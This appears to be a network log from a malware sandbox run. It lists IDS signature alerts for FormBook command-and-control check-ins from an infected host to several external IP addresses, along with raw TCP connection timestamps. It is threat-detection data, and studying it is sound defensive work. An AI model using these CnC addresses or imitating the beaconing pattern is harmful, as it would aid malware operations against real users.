                          07/18/24-08:19:02.667403 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49739 | 80 | 192.168.2.9 | 154.92.52.196
                          07/18/24-08:17:07.218585 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49719 | 80 | 192.168.2.9 | 3.33.130.190
                          07/18/24-08:17:55.148563 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49724 | 80 | 192.168.2.9 | 203.161.55.102
                          07/18/24-08:19:05.208740 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49740 | 80 | 192.168.2.9 | 154.92.52.196
                          07/18/24-08:17:15.304574 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49722 | 80 | 192.168.2.9 | 3.33.130.190
                          07/18/24-08:18:06.178094 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49727 | 80 | 192.168.2.9 | 108.179.193.98
                          07/18/24-08:18:51.948964 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49736 | 80 | 192.168.2.9 | 74.208.46.171
                          07/18/24-08:18:57.038338 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49738 | 80 | 192.168.2.9 | 74.208.46.171
                          07/18/24-08:17:09.840500 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49720 | 80 | 192.168.2.9 | 3.33.130.190
                          07/18/24-08:16:40.771371 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49718 | 80 | 192.168.2.9 | 43.155.26.241
                          07/18/24-08:18:49.409930 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49735 | 80 | 192.168.2.9 | 74.208.46.171
                          07/18/24-08:18:36.102586 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49731 | 80 | 192.168.2.9 | 35.241.34.216
                          07/18/24-08:16:27.240205 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49714 | 80 | 192.168.2.9 | 84.32.84.101
                          07/18/24-08:16:33.167058 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49715 | 80 | 192.168.2.9 | 43.155.26.241
                          07/18/24-08:16:19.614946 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49711 | 80 | 192.168.2.9 | 84.32.84.101
                          07/18/24-08:17:52.606554 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49723 | 80 | 192.168.2.9 | 203.161.55.102
                          07/18/24-08:19:10.273647 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49742 | 80 | 192.168.2.9 | 154.92.52.196
                          07/18/24-08:18:00.211462 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49726 | 80 | 192.168.2.9 | 203.161.55.102
                          07/18/24-08:18:43.710583 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49734 | 80 | 192.168.2.9 | 35.241.34.216
                          Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                          2024-07-18T08:18:14.453133+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49730 | 80 | 192.168.2.9 | 108.179.193.98
                          2024-07-18T08:18:57.570305+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49738 | 80 | 192.168.2.9 | 74.208.46.171
                          2024-07-18T08:18:11.881553+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49729 | 80 | 192.168.2.9 | 108.179.193.98
                          2024-07-18T08:17:02.163543+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49718 | 80 | 192.168.2.9 | 43.155.26.241
                          2024-07-18T08:18:44.354120+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49734 | 80 | 192.168.2.9 | 35.241.34.216
                          2024-07-18T08:17:58.293086+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49725 | 80 | 192.168.2.9 | 203.161.55.102
                          2024-07-18T08:16:39.745635+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49717 | 80 | 192.168.2.9 | 43.155.26.241
                          2024-07-18T08:19:11.204667+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49742 | 80 | 192.168.2.9 | 154.92.52.196
                          2024-07-18T08:18:41.801176+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49733 | 80 | 192.168.2.9 | 35.241.34.216
                          2024-07-18T08:17:47.252891+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49722 | 80 | 192.168.2.9 | 3.33.130.190
                          2024-07-18T08:17:47.252891+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49722 | 80 | 192.168.2.9 | 3.33.130.190
                          2024-07-18T08:16:20.079013+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49711 | 80 | 192.168.2.9 | 84.32.84.101
                          2024-07-18T08:17:55.756640+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49724 | 80 | 192.168.2.9 | 203.161.55.102
                          2024-07-18T08:18:57.570305+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49738 | 80 | 192.168.2.9 | 74.208.46.171
                          2024-07-18T08:17:12.847063+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49721 | 80 | 192.168.2.9 | 3.33.130.190
                          2024-07-18T08:16:27.704677+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49714 | 80 | 192.168.2.9 | 84.32.84.101
                          2024-07-18T08:17:07.672872+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49719 | 80 | 192.168.2.9 | 3.33.130.190
                          2024-07-18T08:18:55.043396+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.9 | 74.208.46.171
                          2024-07-18T08:16:22.641237+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49712 | 80 | 192.168.2.9 | 84.32.84.101
                          2024-07-18T08:19:06.130591+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49740 | 80 | 192.168.2.9 | 154.92.52.196
                          2024-07-18T08:19:03.581277+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49739 | 80 | 192.168.2.9 | 154.92.52.196
                          2024-07-18T08:18:06.824901+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49727 | 80 | 192.168.2.9 | 108.179.193.98
                          2024-07-18T08:19:08.617677+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49741 | 80 | 192.168.2.9 | 154.92.52.196
                          2024-07-18T08:18:14.453133+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49730 | 80 | 192.168.2.9 | 108.179.193.98
                          2024-07-18T08:18:52.810773+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49736 | 80 | 192.168.2.9 | 74.208.46.171
                          2024-07-18T08:17:02.163543+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49718 | 80 | 192.168.2.9 | 43.155.26.241
                          2024-07-18T08:18:44.354120+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49734 | 80 | 192.168.2.9 | 35.241.34.216
                          2024-07-18T08:18:49.928508+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49735 | 80 | 192.168.2.9 | 74.208.46.171
                          2024-07-18T08:18:00.826691+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49726 | 80 | 192.168.2.9 | 203.161.55.102
                          2024-07-18T08:17:53.209829+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49723 | 80 | 192.168.2.9 | 203.161.55.102
                          2024-07-18T08:15:55.872871+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49709 | 80 | 192.168.2.9 | 23.227.38.74
                          2024-07-18T08:16:37.214368+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49716 | 80 | 192.168.2.9 | 43.155.26.241
                          2024-07-18T08:16:25.187168+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49713 | 80 | 192.168.2.9 | 84.32.84.101
                          2024-07-18T08:18:09.326768+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49728 | 80 | 192.168.2.9 | 108.179.193.98
                          2024-07-18T08:18:39.270968+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49732 | 80 | 192.168.2.9 | 35.241.34.216
                          2024-07-18T08:17:11.356835+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49720 | 80 | 192.168.2.9 | 3.33.130.190
                          2024-07-18T08:18:00.826691+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49726 | 80 | 192.168.2.9 | 203.161.55.102
                          2024-07-18T08:19:11.204667+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49742 | 80 | 192.168.2.9 | 154.92.52.196
                          2024-07-18T08:16:34.683122+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49715 | 80 | 192.168.2.9 | 43.155.26.241
                          2024-07-18T08:18:36.737717+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49731 | 80 | 192.168.2.9 | 35.241.34.216
                          2024-07-18T08:15:55.872871+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49709 | 80 | 192.168.2.9 | 23.227.38.74
                          2024-07-18T08:16:27.704677+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49714 | 80 | 192.168.2.9 | 84.32.84.101
                          Jul 18, 2024 08:16:35.713188887 CEST804971643.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:37.214368105 CEST4971680192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:37.261219025 CEST804971643.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:38.232844114 CEST4971780192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:38.238434076 CEST804971743.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:38.238575935 CEST4971780192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:38.240376949 CEST4971780192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:38.245676041 CEST804971743.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:38.245894909 CEST804971743.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:39.745635033 CEST4971780192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:39.797272921 CEST804971743.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:40.764537096 CEST4971880192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:40.769467115 CEST804971843.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:40.769556046 CEST4971880192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:40.771370888 CEST4971880192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:40.776576042 CEST804971843.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:54.556715012 CEST804971543.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:54.556822062 CEST4971580192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:57.076055050 CEST804971643.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:57.076406956 CEST4971680192.168.2.943.155.26.241
                          Jul 18, 2024 08:16:59.600429058 CEST804971743.155.26.241192.168.2.9
                          Jul 18, 2024 08:16:59.600498915 CEST4971780192.168.2.943.155.26.241
                          Jul 18, 2024 08:17:02.163413048 CEST804971843.155.26.241192.168.2.9
                          Jul 18, 2024 08:17:02.163542986 CEST4971880192.168.2.943.155.26.241
                          Jul 18, 2024 08:17:02.164645910 CEST4971880192.168.2.943.155.26.241
                          Jul 18, 2024 08:17:02.170032024 CEST804971843.155.26.241192.168.2.9
                          Jul 18, 2024 08:17:07.209494114 CEST4971980192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:07.215492964 CEST80497193.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:07.215806961 CEST4971980192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:07.218585014 CEST4971980192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:07.232430935 CEST80497193.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:07.672807932 CEST80497193.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:07.672872066 CEST4971980192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:08.730571985 CEST4971980192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:08.735521078 CEST80497193.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:09.748648882 CEST4972080192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:09.838207006 CEST80497203.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:09.838375092 CEST4972080192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:09.840500116 CEST4972080192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:09.845412016 CEST80497203.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:11.356834888 CEST4972080192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:11.362351894 CEST80497203.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:11.366200924 CEST4972080192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:12.374613047 CEST4972180192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:12.379810095 CEST80497213.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:12.379909992 CEST4972180192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:12.382019997 CEST4972180192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:12.386931896 CEST80497213.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:12.387090921 CEST80497213.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:12.846986055 CEST80497213.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:12.847063065 CEST4972180192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:13.886296034 CEST4972180192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:13.891397953 CEST80497213.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:14.904736996 CEST4972280192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:15.299384117 CEST80497223.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:15.300934076 CEST4972280192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:15.304574013 CEST4972280192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:15.309638023 CEST80497223.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:47.252397060 CEST80497223.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:47.252716064 CEST80497223.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:47.252891064 CEST4972280192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:47.255429029 CEST4972280192.168.2.93.33.130.190
                          Jul 18, 2024 08:17:47.260426044 CEST80497223.33.130.190192.168.2.9
                          Jul 18, 2024 08:17:52.596467972 CEST4972380192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:52.601967096 CEST8049723203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:52.602664948 CEST4972380192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:52.606554031 CEST4972380192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:52.611483097 CEST8049723203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:53.209460974 CEST8049723203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:53.209685087 CEST8049723203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:53.209829092 CEST4972380192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:54.120896101 CEST4972380192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:55.139121056 CEST4972480192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:55.144200087 CEST8049724203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:55.144644976 CEST4972480192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:55.148562908 CEST4972480192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:55.159688950 CEST8049724203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:55.756464005 CEST8049724203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:55.756566048 CEST8049724203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:55.756639957 CEST4972480192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:56.654558897 CEST4972480192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:57.671310902 CEST4972580192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:57.676459074 CEST8049725203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:57.676537037 CEST4972580192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:57.678827047 CEST4972580192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:57.683922052 CEST8049725203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:57.683938026 CEST8049725203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:58.292809963 CEST8049725203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:58.293035984 CEST8049725203.161.55.102192.168.2.9
                          Jul 18, 2024 08:17:58.293086052 CEST4972580192.168.2.9203.161.55.102
                          Jul 18, 2024 08:17:59.186569929 CEST4972580192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.203238010 CEST4972680192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.208331108 CEST8049726203.161.55.102192.168.2.9
                          Jul 18, 2024 08:18:00.208424091 CEST4972680192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.211462021 CEST4972680192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.217499971 CEST8049726203.161.55.102192.168.2.9
                          Jul 18, 2024 08:18:00.822619915 CEST8049726203.161.55.102192.168.2.9
                          Jul 18, 2024 08:18:00.823582888 CEST8049726203.161.55.102192.168.2.9
                          Jul 18, 2024 08:18:00.826690912 CEST4972680192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.833055019 CEST4972680192.168.2.9203.161.55.102
                          Jul 18, 2024 08:18:00.838063955 CEST8049726203.161.55.102192.168.2.9
                          Jul 18, 2024 08:18:06.170804024 CEST4972780192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:06.175941944 CEST8049727108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:06.176511049 CEST4972780192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:06.178093910 CEST4972780192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:06.183739901 CEST8049727108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:06.824328899 CEST8049727108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:06.824666023 CEST8049727108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:06.824901104 CEST4972780192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:07.683217049 CEST4972780192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:08.701838970 CEST4972880192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:08.709564924 CEST8049728108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:08.709701061 CEST4972880192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:08.711636066 CEST4972880192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:08.716677904 CEST8049728108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:09.324654102 CEST8049728108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:09.326689005 CEST8049728108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:09.326767921 CEST4972880192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:10.214411020 CEST4972880192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:11.233186960 CEST4972980192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:11.246686935 CEST8049729108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:11.246767044 CEST4972980192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:11.248905897 CEST4972980192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:11.255764961 CEST8049729108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:11.255778074 CEST8049729108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:11.881146908 CEST8049729108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:11.881282091 CEST8049729108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:11.881552935 CEST4972980192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:12.761316061 CEST4972980192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:13.782610893 CEST4973080192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:13.788152933 CEST8049730108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:13.790674925 CEST4973080192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:13.794574976 CEST4973080192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:13.799437046 CEST8049730108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:14.452423096 CEST8049730108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:14.453058004 CEST8049730108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:14.453133106 CEST4973080192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:14.458321095 CEST4973080192.168.2.9108.179.193.98
                          Jul 18, 2024 08:18:14.463706970 CEST8049730108.179.193.98192.168.2.9
                          Jul 18, 2024 08:18:36.090595961 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:36.095510960 CEST804973135.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:36.098733902 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:36.102586031 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:36.107716084 CEST804973135.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:36.734452963 CEST804973135.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:36.737665892 CEST804973135.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:36.737716913 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:36.737797022 CEST804973135.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:36.737843037 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:37.605235100 CEST4973180192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:38.626563072 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:38.631634951 CEST804973235.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:38.632774115 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:38.635194063 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:38.640106916 CEST804973235.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:39.267457962 CEST804973235.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:39.270921946 CEST804973235.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:39.270967960 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:39.271173000 CEST804973235.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:39.271222115 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:40.136622906 CEST4973280192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:41.155662060 CEST4973380192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:41.160835028 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.160919905 CEST4973380192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:41.163125038 CEST4973380192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:41.167994022 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.168015003 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.797302008 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.800997019 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.801068068 CEST804973335.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:41.801176071 CEST4973380192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:42.669421911 CEST4973380192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:43.686786890 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:43.704982996 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:43.706787109 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:43.710582972 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:43.718113899 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.340939045 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.353832960 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.353916883 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.353924036 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.354120016 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:44.354181051 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.354187012 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.354304075 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:44.354332924 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:44.354738951 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:44.359829903 CEST4973480192.168.2.935.241.34.216
                          Jul 18, 2024 08:18:44.364761114 CEST804973435.241.34.216192.168.2.9
                          Jul 18, 2024 08:18:49.397089958 CEST4973580192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:49.401922941 CEST804973574.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:49.402000904 CEST4973580192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:49.409929991 CEST4973580192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:49.417939901 CEST804973574.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:49.925992012 CEST804973574.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:49.926119089 CEST804973574.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:49.928508043 CEST4973580192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:50.917727947 CEST4973580192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:51.938596010 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:51.943465948 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:51.946760893 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:51.948964119 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:51.953777075 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:52.810693026 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:52.810719013 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:52.810729980 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:52.810739994 CEST804973674.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:52.810772896 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:52.810810089 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:53.464473009 CEST4973680192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:54.484971046 CEST4973780192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:54.489892960 CEST804973774.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:54.493709087 CEST4973780192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:54.496222019 CEST4973780192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:54.501504898 CEST804973774.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:54.501514912 CEST804973774.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:55.043245077 CEST804973774.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:55.043332100 CEST804973774.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:55.043395996 CEST4973780192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:56.011464119 CEST4973780192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.030039072 CEST4973880192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.036252975 CEST804973874.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:57.036463976 CEST4973880192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.038337946 CEST4973880192.168.2.974.208.46.171
                          Jul 18, 2024 08:18:57.043263912 CEST804973874.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:57.569361925 CEST804973874.208.46.171192.168.2.9
                          Jul 18, 2024 08:18:57.569850922 CEST804973874.208.46.171192.168.2.9
